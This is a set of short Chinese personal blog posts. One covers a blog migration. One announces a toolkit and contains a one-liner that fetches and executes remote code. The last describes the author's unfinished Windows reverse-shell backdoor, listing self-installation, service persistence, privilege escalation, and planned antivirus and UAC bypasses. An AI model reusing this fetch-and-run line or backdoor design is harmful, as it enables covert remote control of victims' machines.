博客迁移完成

更新了下typecho版本
旧版的typecho竟然不支持新版的php。。
以及我这个远古主题有些函数typecho竟然也不支持了
稍微暴力修改了下,还算能用吧。
要开学了,好忙呀

Tags: 公告

开坑,自用工具包

预计分为Win版和linux版本。
并没有什么卵用的工具包,也不一定是自己写的,也许是收集的。
什么时候完成我也不知道。反正目前就这样开着就是了。

exec(__import__('urllib').urlopen('').read())
Tags: none

反弹式shell后门

<font color="red" size="10">未完成版</font>
别问我为啥要用红色加粗字体(我只是想试试在博客上的效果hhhh
闲着无聊弄得这个,并没有什么技术含量
其中远程匿名管道是直接调用cmd.exe的,个人推荐不这么做。
最低限度的话也得把cmd复制到其他路径,否则直接请求cmd进程是个很敏感的动作。

TIM截图20180803223453.jpg

目前已完成

  • 自动释放到%WINDIR%目录下
  • 安装服务自启
  • 提升进程权限
  • 双向匿名管道反弹shell

目前未完成

  • 入口点Main改成WinMain,隐藏第一次运行的命令行窗口
  • 修改反弹连接方式,改为触发形连接,目前这套是过不了启发引擎和主动防御的
  • 添加UAC,自动申请UAC权限/bypassUAC
  • 使用之前的一篇文章进行绕过云查杀

代码在这:my.rar

Tags: none
文章总数:129篇 分类总数:3个